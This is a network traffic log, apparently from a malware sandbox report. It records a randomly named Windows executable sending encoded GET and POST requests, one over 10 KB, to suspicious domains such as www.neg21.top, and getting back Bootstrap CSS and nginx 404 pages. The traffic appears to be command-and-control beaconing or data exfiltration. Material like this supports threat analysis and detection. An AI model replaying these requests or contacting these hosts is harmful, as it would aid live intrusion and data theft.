Nov 11, 2024 08:33:45.837393999 CET	1236	IN	Data Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
Nov 11, 2024 08:33:45.837399006 CET	212	IN	Data Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
Nov 11, 2024 08:33:45.837575912 CET	1236	IN	Data Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
Nov 11, 2024 08:33:45.837611914 CET	212	IN	Data Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
Nov 11, 2024 08:33:45.837739944 CET	1236	IN	Data Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
Nov 11, 2024 08:33:45.842319012 CET	1236	IN	Data Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50042	38.47.237.27	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:47.866147995 CET	532	OUT	GET /cymd/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= HTTP/1.1 Host: www.iuyi542.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:33:48.381830931 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:48 GMT Content-Type: text/html Content-Length: 167433 Connection: close ETag: "652641ca-28e09"
Nov 11, 2024 08:33:48.381983995 CET	1236	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
Nov 11, 2024 08:33:48.381990910 CET	1236	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-in
Nov 11, 2024 08:33:48.382003069 CET	424	IN	Data Raw: 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 Data Ascii: Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc
Nov 11, 2024 08:33:48.382090092 CET	1236	IN	Data Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
Nov 11, 2024 08:33:48.382100105 CET	212	IN	Data Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
Nov 11, 2024 08:33:48.382159948 CET	1236	IN	Data Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
Nov 11, 2024 08:33:48.382164955 CET	212	IN	Data Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
Nov 11, 2024 08:33:48.382345915 CET	1236	IN	Data Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
Nov 11, 2024 08:33:48.382407904 CET	212	IN	Data Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-s
Nov 11, 2024 08:33:48.387018919 CET	1236	IN	Data Raw: 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 66 6f 6e 74 2d 77 65 Data Ascii: ize:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.2}.display-2{font-size:5.5rem;font-weight:300;line-height:1.2}.display-3{font-size:4.5rem;font-weight:300;line-height:1.2}.display-4{font-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50043	206.119.81.36	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:54.265187025 CET	781	OUT	POST /1i1f/ HTTP/1.1 Host: www.neg21.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.neg21.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.neg21.top/1i1f/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 51 53 77 36 67 52 37 30 45 69 77 31 77 46 58 62 62 33 78 4d 50 45 58 33 39 58 48 57 37 2f 79 76 34 69 7a 58 32 56 61 53 38 45 34 61 63 2f 67 4d 32 4b 72 30 77 6c 50 38 55 31 4a 32 57 2b 63 61 56 4c 76 71 4c 35 47 46 32 4d 6b 47 31 42 4d 6b 39 71 72 32 64 54 53 4b 4a 42 5a 38 78 47 37 42 5a 74 2f 38 58 75 6f 43 56 79 53 36 64 31 37 59 43 56 59 6a 73 43 42 77 6d 4a 4b 43 52 7a 4c 34 48 55 79 65 54 55 79 49 71 6e 32 66 6e 62 77 32 43 77 47 68 50 63 6b 69 6b 49 2b 32 39 47 57 4d 6a 69 39 6d 71 4e 7a 2f 31 74 5a 56 6b 54 4d 6f 59 39 62 4a 30 70 79 41 6d 37 57 63 67 45 6c 59 61 41 3d 3d Data Ascii: Ir8HUj=QSw6gR70Eiw1wFXbb3xMPEX39XHW7/yv4izX2VaS8E4ac/gM2Kr0wlP8U1J2W+caVLvqL5GF2MkG1BMk9qr2dTSKJBZ8xG7BZt/8XuoCVyS6d17YCVYjsCBwmJKCRzL4HUyeTUyIqn2fnbw2CwGhPckikI+29GWMji9mqNz/1tZVkTMoY9bJ0pyAm7WcgElYaA==
Nov 11, 2024 08:33:55.005606890 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:54 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50044	206.119.81.36	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:56.809185028 CET	801	OUT	POST /1i1f/ HTTP/1.1 Host: www.neg21.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.neg21.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.neg21.top/1i1f/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 63 61 63 66 51 4d 6b 62 72 30 39 46 50 38 41 6c 4a 35 59 65 63 56 56 4d 6e 59 4c 38 2b 46 32 4d 67 47 31 42 38 6b 39 5a 44 31 64 44 53 49 53 78 5a 2b 31 47 37 42 5a 74 2f 38 58 75 39 76 56 79 4b 36 65 42 2f 59 45 48 38 67 67 69 42 33 72 5a 4b 43 48 44 4c 30 48 55 7a 6b 54 56 65 75 71 6c 4f 66 6e 5a 34 32 43 6c 36 75 61 73 6c 6e 35 59 2f 45 30 6b 72 63 36 78 55 61 6e 66 66 59 36 65 31 6b 6f 31 42 79 4a 4d 36 65 6d 70 57 7a 37 38 66 6f 74 48 59 52 42 4b 6e 58 53 32 50 58 41 52 6b 53 41 69 58 42 69 55 62 55 39 32 77 3d Data Ascii: Ir8HUj=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82cacfQMkbr09FP8AlJ5YecVVMnYL8+F2MgG1B8k9ZD1dDSISxZ+1G7BZt/8Xu9vVyK6eB/YEH8ggiB3rZKCHDL0HUzkTVeuqlOfnZ42Cl6uasln5Y/E0krc6xUanffY6e1ko1ByJM6empWz78fotHYRBKnXS2PXARkSAiXBiUbU92w=
Nov 11, 2024 08:33:57.608122110 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:57 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50045	206.119.81.36	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:59.359472036 CET	10883	OUT	POST /1i1f/ HTTP/1.1 Host: www.neg21.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.neg21.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.neg21.top/1i1f/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 55 61 63 75 77 4d 32 73 2f 30 79 6c 50 38 44 6c 4a 36 59 65 63 79 56 4e 44 63 4c 38 36 4b 32 4f 6f 47 30 69 30 6b 31 49 44 31 57 44 53 49 4e 42 5a 2f 78 47 36 56 5a 75 48 77 58 75 74 76 56 79 4b 36 65 41 50 59 53 6c 59 67 6d 69 42 77 6d 4a 4b 4f 52 7a 4b 72 48 55 36 47 54 56 71 59 70 55 75 66 67 36 51 32 4f 33 53 75 47 38 6c 70 36 59 2f 63 30 6b 6d 47 36 78 4a 72 6e 62 66 69 36 64 70 6b 35 52 77 53 55 50 6d 43 6b 34 2b 62 73 4d 72 43 70 6d 51 57 4b 34 2b 75 65 6c 58 2b 61 44 34 51 62 52 75 74 78 42 50 66 75 6a 49 43 4e 74 78 6b 69 56 78 48 41 66 6e 6e 5a 78 44 31 6a 74 35 30 63 42 64 48 72 67 75 77 73 67 59 71 39 36 63 67 43 69 6f 79 54 33 63 57 42 71 38 4e 4a 4a 52 69 52 78 53 69 42 79 69 71 55 4e 62 30 7a 4f 72 39 50 74 73 4c 62 68 51 46 70 53 74 33 54 62 4c 54 33 6e 64 68 54 69 39 39 4b 37 4b 32 70 55 39 4b 43 58 58 6b 37 4f 6a 6b 78 54 73 76 78 54 43 [TRUNCATED] Data Ascii: Ir8HUj=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82UacuwM2s/0ylP8DlJ6YecyVNDcL86K2OoG0i0k1ID1WDSINBZ/xG6VZuHwXutvVyK6eAPYSlYgmiBwmJKORzKrHU6GTVqYpUufg6Q2O3SuG8lp6Y/c0kmG6xJrnbfi6dpk5RwSUPmCk4+bsMrCpmQWK4+uelX+aD4QbRutxBPfujICNtxkiVxHAfnnZxD1jt50cBdHrguwsgYq96cgCioyT3cWBq8NJJRiRxSiByiqUNb0zOr9PtsLbhQFpSt3TbLT3ndhTi99K7K2pU9KCXXk7OjkxTsvxTCLgSc8MYUQcqvd/Tpzz8ogbwiJKZUdgEjHvD9Ydd5hwkXtvqFg6Qbk7wyJ3BJBrbo4QcTS/xV5yjR8dZSsqeD2Hi8U6KpsWJfBOXixpfnp5sjhgBInoL3YPCnFuOU1ACzW90Lhn2yvlYRVCPTiylKnwX41zyC/+5q4nbACTq0dpgt2rFpsoRAsAZuygni7YBmCil/zbyzOMsE208KEmNo7DJXwk1eCcbjVxYUGuL8A28dayxdEj2Yc3wTrVFxDhh+pHd4PNeUVm0beT770r/qV3zF8JNr7TiUUj8YvYE6yLqMpXED+uVgr4pHFWa2UQXAl8vN64LrHVgbfAWZ81qiGpnxXHBKn/L6ayWN4XIRbSH1cGIALeQY5tOguRfDVXQrHWa9kM3svsbVZe9paOAjkCiUa3O1BaWZqW1fxir2DhYnczhvUCZbsfg/Q/TnJOdSIW9ByEIjzkRvbGUSGVYpPyC4/vojzf1Fa85+WbXKfTI1qUxC3ei7gt223A1pqfe6ZFnRJN87MiIydOlwugrEqRgt6lekhvBukRlgoAnKxmdTYUa9VRre8mUQviciPzPzzcYh2Q+8G9vUhIN128M0msEHcLFN/5wCmAiwR0EfTDMNJZXQI57lyx+n7fDa98glB8mh8SRYYeKpMJrT6i5pKeIU+I0TqcS7rI [TRUNCATED]
Nov 11, 2024 08:34:00.155982018 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:00 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50046	206.119.81.36	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:01.975527048 CET	530	OUT	GET /1i1f/?Ir8HUj=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.neg21.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
